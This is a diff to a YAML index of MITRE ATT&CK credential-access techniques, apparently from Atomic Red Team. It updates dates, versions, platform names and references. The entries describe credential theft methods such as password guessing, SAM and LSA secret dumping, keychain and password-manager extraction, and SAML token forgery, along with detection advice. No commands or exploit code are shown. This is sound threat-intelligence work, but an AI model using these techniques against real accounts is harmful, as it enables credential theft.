+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -43925,12 +44587,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43959,6 +44620,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -43970,18 +44632,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -44008,14 +44670,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -44139,12 +44798,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -44159,10 +44817,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -44170,14 +44829,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -44220,14 +44879,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -44282,14 +44938,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44340,9 +44995,8 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests:
     - name: Azure - Dump Azure Instance Metadata from Virtual Machines
@@ -44369,7 +45023,7 @@ credential-access:
         name: powershell
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -44403,8 +45057,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -44421,11 +45075,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
-      modified: '2023-03-30T21:01:48.643Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Cracking'
       description: "Adversaries may use password cracking to attempt to recover usable
         credentials, such as plaintext passwords, when credential material such as
@@ -44443,7 +45096,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Mohamed Kmal
       x_mitre_deprecated: false
@@ -44460,10 +45113,10 @@ credential-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Azure AD
       - Network
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -44487,46 +45140,12 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Password_cracking
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1110.002
     atomic_tests: []
   T1555.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
-      created: '2020-02-12T18:55:24.728Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.001
-        url: https://attack.mitre.org/techniques/T1555/001
-      - source_name: External to DA, the OS X Way
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-      - source_name: Keychain Services Apple
-        url: https://developer.apple.com/documentation/security/keychain_services
-        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
-      - source_name: Empire Keychain Decrypt
-        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
-        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
-          Retrieved April 14, 2022.
-      - source_name: OSX Keychain Schaumann
-        url: https://www.netmeister.org/blog/keychain-passwords.html
-        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
-          store and retrieve passwords. Retrieved March 31, 2022.
-      - source_name: Keychain Decryption Passware
-        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
-        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
-          Retrieved April 13, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:35:39.985Z'
+      name: 'Credentials from Password Stores: Keychain'
       description: "Adversaries may acquire credentials from Keychain. Keychain (or
         Keychain Services) is the macOS credential management system that stores account
         names, passwords, private keys, certificates, sensitive application data,
@@ -44547,65 +45166,62 @@ credential-access:
         file. Both methods require a password, where the default password for the
         Login Keychain is the current user’s password to login to the macOS host.(Citation:
         External to DA, the OS X Way)(Citation: Empire Keychain Decrypt)  "
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Credentials from Password Stores: Keychain'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Unlocking the keychain and using passwords from it is a very
         common process, so there is likely to be a lot of noise in any detection technique.
         Monitoring of system calls to the keychain can help determine if there is
         a suspicious process trying to access it.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Process: OS API Execution'
       - 'File: File Access'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+      created: '2020-02-12T18:55:24.728Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/001
+        external_id: T1555.001
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      - source_name: Keychain Services Apple
+        description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+        url: https://developer.apple.com/documentation/security/keychain_services
+      - source_name: Empire Keychain Decrypt
+        description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+          Retrieved April 14, 2022.
+        url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+      - source_name: OSX Keychain Schaumann
+        description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+          store and retrieve passwords. Retrieved March 31, 2022.
+        url: https://www.netmeister.org/blog/keychain-passwords.html
+      - source_name: Keychain Decryption Passware
+        description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+          Retrieved April 13, 2022.
+        url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.001
     atomic_tests: []
   T1003.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ed Williams, Trustwave, SpiderLabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
-      type: attack-pattern
-      created: '2020-02-21T16:22:09.493Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.004
-        url: https://attack.mitre.org/techniques/T1003/004
-      - source_name: Passcape LSA Secrets
-        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
-        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
-          2020.
-      - source_name: Microsoft AD Admin Tier Model
-        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
-        description: Microsoft. (2019, February 14). Active Directory administrative
-          tier model. Retrieved February 21, 2020.
-      - source_name: Tilbury Windows Credentials
-        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
-        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
-          Mitigation, Defense. Retrieved February 21, 2020.'
-      - source_name: ired Dumping LSA Secrets
-        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
-        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
-          Retrieved February 21, 2020.
-      - url: https://github.com/mattifestation/PowerSploit
-        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
-        source_name: Powersploit
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-13T15:49:17.591Z'
       name: 'OS Credential Dumping: LSA Secrets'
       description: |-
         Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
@@ -44614,6 +45230,9 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ed Williams, Trustwave, SpiderLabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor processes and command-line arguments for program
         execution that may be indicative of credential dumping. Remote access tools
         may contain built-in features or incorporate existing tools like Mimikatz.
@@ -44621,31 +45240,63 @@ credential-access:
         such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
         may require additional logging features to be configured in the operating
         system to collect necessary information for analysis.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+      created: '2020-02-21T16:22:09.493Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/004
+        external_id: T1003.004
+      - source_name: Tilbury Windows Credentials
+        description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+          Mitigation, Defense. Retrieved February 21, 2020.'
+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -44658,14 +45309,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -44706,14 +45357,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44776,81 +45424,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44935,12 +45581,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44989,38 +45634,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
